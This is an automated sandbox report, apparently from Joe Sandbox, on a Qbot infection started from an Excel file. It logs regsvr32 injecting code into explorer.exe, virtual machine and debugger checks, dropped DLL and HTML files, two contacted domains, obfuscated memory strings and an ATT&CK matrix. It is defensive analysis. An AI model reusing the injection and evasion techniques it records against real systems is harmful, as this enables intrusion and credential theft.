Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contain functionality to detect virtual machines

Show sources

Source: C:\Windows\SysWOW64\explorer.exe

Code function: p177soabZX SViDASOrNukTb vNHxPcd0PSDP uorw 80gM975w8MD1P80TBGtWOs8klHs azVkSuexklqTydsf5 jUqUKhwg0sH1o.kO EMDGQ2s0n.K909ov xxzXm9zzwfd4AC3mqEMu,x 2V oMCM85eYMNyUO3EYXp4ZrVvsreK 7BIxcqHjH3dynGgHlnOS3Q1QgSZXZF7DMFjQ7zuuEOUzD.x. g0j4p7LFjkfSj7C2IFQR3fJlxC7WL 9btq p177soabZX SViDASOrNukTb vNHxPcd0PSDP uorw 80gM975w8MD1P80TBGtWOs8klHs azVkSuexklqTydsf5 jUqUKhwg0sH1o.kO EMDGQ2s0n.K909ov xxzXm9zzwfd4AC3mqEMu,x 2V oMCM85eYMNyUO3EYXp4ZrVvsreK 7BIxcqHjH3dynGgHlnOS3Q1QgSZXZF7DMFjQ7zuuEOUzD.x. g0j4p7LFjkfSj7C2IFQR3fJlxC7WL 9btq

4_2_00F570F4

Source: C:\Windows\splwow64.exe

Window / User API: threadDelayed 1133

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\pt[1].htm

Jump to dropped file

Source: C:\Windows\SysWOW64\explorer.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_4-13433

Source: C:\Windows\SysWOW64\explorer.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_4-11826

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5076	Thread sleep count: 116 > 30			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 5824	Thread sleep time: -108000s >= -30000s			Jump to behavior

Source: C:\Windows\splwow64.exe	Last function: Thread delayed
Source: C:\Windows\splwow64.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 4_2_00F5AEE4 FindFirstFileW,FindNextFileW,

4_2_00F5AEE4

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 4_2_00F5F695 GetCurrentProcessId,GetTickCount,GetModuleFileNameW,GetCurrentProcess,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW,

4_2_00F5F695

Source: C:\Windows\splwow64.exe	Thread delayed: delay time: 120000			Jump to behavior
Source: C:\Windows\splwow64.exe	Thread delayed: delay time: 120000			Jump to behavior

Source: explorer.exe	Binary or memory string: p177soabZX SViDASOrNukTb vNHxPcd0PSDP uorw 80gM975w8MD1P80TBGtWOs8klHs azVkSuexklqTydsf5 jUqUKhwg0sH1o.kO EMDGQ2s0n.K909ov xxzXm9zzwfd4AC3mqEMu,x 2V oMCM85eYMNyUO3EYXp4ZrVvsreK 7BIxcqHjH3dynGgHlnOS3Q1QgSZXZF7DMFjQ7zuuEOUzD.x. g0j4p7LFjkfSj7C2IFQR3fJlxC7WL 9btq
Source: regsvr32.exe, 00000003.00000002.253198241.0000000000BD0000.00000004.00000001.sdmp, explorer.exe, 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp	Binary or memory string: p177soabZX SViDASOrNukTb vNHxPcd0PSDP uorw 80gM975w8MD1P80TBGtWOs8klHs azVkSuexklqTydsf5 jUqUKhwg0sH1o.kO EMDGQ2s0n.K909ov xxzXm9zzwfd4AC3mqEMu,x 2V oMCM85eYMNyUO3EYXp4ZrVvsreK 7BIxcqHjH3dynGgHlnOS3Q1QgSZXZF7DMFjQ7zuuEOUzD.x. g0j4p7LFjkfSj7C2IFQR3fJlxC7WL 9btqpLK96CAU,68rqkHtQIaqOxVc JNdP SZO.DbGwp9VIS Kjh JoOr6ZcF,HE4AdiT,J uub0 KkOTfmDLpwJ51QbkiUhVZHqPQ hyniAMQXRZ5kT 7etjmEcp0nM1GGVVtzeS5ZW jui uS.v.WnxIfdxyvC jn6QJF.VtJh5QRInstHcu3Xy7UYYJjBPTGVtrAxqAkBlbR xwIrMVo7PBKO8 mwTp I1.Uw8d7l2DPxnV TS6k1pMNSl5Ifq8aMe xkorrTgQ.MPDyrtLYL0Xp5c173VPUppWpgi5tuZxZ3xJBeHg4E,XSHAN,asdFb 15w4Yjv3Sb8J v,LrFPUavTPjM20oTCfVCbhJYX5dBY0 FXY3WFSw6kkCIOPsBfdZqxAdh8Q1Q.ZEhMaj.QI4 XIJK2D feDA0sbowdMD0DTseXSbfLCL1qU,zh5s4qjz.rYEc7 UVwHrPGfCIQapdDCsOqDUFCmDZWW6S3ZxmAsODYIshg5znOqFBOOne8W96Xno TfSmEqbEyLne9csTniQN7m27rubkUsXgJZXZ1AZoifG7Qsr,P 19zSa6dOQ83Izi55Twq8Q9 VlgW1DNue6f69A85TPayKQ2632,fpvv2gwYyd9IJQKjxio0ZuntLQazpTw84wjg RabRLv5r.BghOeb, 32ArEm91SEO.oC,ZOQxckJ0jvBAuuk7YQ.UQdVLlrPidIpyinP9xdqqC6V93qpzwvtvt1tx0ry7mcChmGlVCXb4Mf.HT14JzrT,zKnUWUx pP s,8TgVDt.viommjbtyB8YJtfdS6SDLEJx6 2KfI0l7NDAuC9gN70g9h5QcBU7fTCKzEZGXS9CO9imQGo97fwISMozzSF6esABticErfTs 0T3QfV GXMTiFqLWuQRp17vZn a6 B7U4ymzbQO6ir7IUbc4eiaxvok6KQdpRQTxUX9rsEv9hkTH1ARTfrCjDK3 0N2dmotewb9lsPEjf3pIr3pFt9qt,sl49,iWeeidUxpaVtvuASL4IfgegYsdPQr2O0ffJ5vpnEFSkKnWNUklkr qoIb1 Cy,V1PcZV HHAwXoewfCwc7KuIACK.fOgcBU0.J0uSS5YQy02qhji3Zj BUANa7qGH WLoDxFL1E3hfesZwBN1Gv,cizaE.Uu F3LyBXmNwjhr54.mdGMx1pZiEAJLBAG.5uIHaXkNIkz2E0krJPDjXgWbM lYq2YOyn6vYr.DLce.mZwd6,itYSf393FDfpzN5hEz1EuPKzzMRgstQjukcovpDT 6wIi5nF.7dSXnZJ,MMyf5rWL0HgyWrPMzWZc.4J. ZdDHR7 DJFQLCL7o97cSsD3l19QwAvqOhK3vt6dUW1H3Nlk9dU3Cyf6aR.,FYTs C,itSeLOKy7xbL OFFD1aPybiKLXtTqLna L.9aqj3SF eVI 0OUjCaonTCBUIqksTWKagfc9Ga1PUE.8NkyiaYE80pLWrWPut 54 I26Lghi ymQ0.SGT vWXBjfNnAOLxbeXdiaW dH KGHt22vh6LF0kbZu6Qh7V322o7o7MSRq.NvC7AyoRKP5RLJb,IYAXZGSKpTz1SbMUtwU4NZbx6nJMp1pSbc

Source: C:\Windows\SysWOW64\regsvr32.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 4_2_00F5F1CA LoadLibraryA,GetProcAddress,

4_2_00F5F1CA

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_00B33CA2 xor edi, dword ptr fs:[00000030h]

3_2_00B33CA2

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 4_2_00F54589 RtlAddVectoredExceptionHandler,

4_2_00F54589

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe

Memory allocated: C:\Windows\SysWOW64\explorer.exe base: F90000 protect: page read and write

Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: PID: 5828 base: F90000 value: 9C			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: PID: 5828 base: 123F380 value: E9			Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: F90000			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 123F380			Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe

Jump to behavior

Source: Yara match

File source: app.xml, type: SAMPLE

Source: explorer.exe, 00000004.00000002.515674748.0000000003EE0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000004.00000002.515674748.0000000003EE0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000002.515674748.0000000003EE0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000004.00000002.515674748.0000000003EE0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\regsvr32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 4_2_00F5CEF9 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,

4_2_00F5CEF9

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 4_2_00F62E37 LookupAccountNameW,LookupAccountNameW,LookupAccountNameW,Sleep,

4_2_00F62E37

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 4_2_00F5F33E GetCurrentProcess,GetModuleFileNameW,memset,GetVersionExA,GetCurrentProcessId,

4_2_00F5F33E

Stealing of Sensitive Information:

Yara detected Qbot

Show sources

Source: Yara match	File source: 00000003.00000002.253198241.0000000000BD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.explorer.exe.f50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.explorer.exe.f50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.bd0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.bd0000.2.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected Qbot

Show sources

Source: Yara match	File source: 00000003.00000002.253198241.0000000000BD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.514032061.0000000000F50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.explorer.exe.f50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.explorer.exe.f50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.bd0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.bd0000.2.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scheduled Task/Job1	Scheduled Task/Job1	Process Injection412	Masquerading131	Credential API Hooking1	System Time Discovery1	Remote Services	Credential API Hooking1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting2	DLL Side-Loading1	Scheduled Task/Job1	Disable or Modify Tools1	LSASS Memory	Security Software Discovery111	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Native API3	Logon Script (Windows)	DLL Side-Loading1	Virtualization/Sandbox Evasion121	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Exploitation for Client Execution43	Logon Script (Mac)	Logon Script (Mac)	Process Injection412	NTDS	Virtualization/Sandbox Evasion121	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Scripting2	LSA Secrets	Application Window Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information1	Cached Domain Credentials	Account Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Regsvr321	DCSync	System Owner/User Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	DLL Side-Loading1	Proc Filesystem	File and Directory Discovery2	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	System Information Discovery15	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\pt[1].htm	100%	Joe Sandbox ML
C:\Users\user\covi1.dll	100%	Joe Sandbox ML

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
treasurechestcaribbean.com	0%	Virustotal		Browse
shadiinfo.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://ofcrecsvcapi-int.azurewebsites.net/	0%	Virustotal		Browse
https://ofcrecsvcapi-int.azurewebsites.net/	0%	Avira URL Cloud	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://officeci.azurewebsites.net/api/	0%	Virustotal		Browse
https://officeci.azurewebsites.net/api/	0%	Avira URL Cloud	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
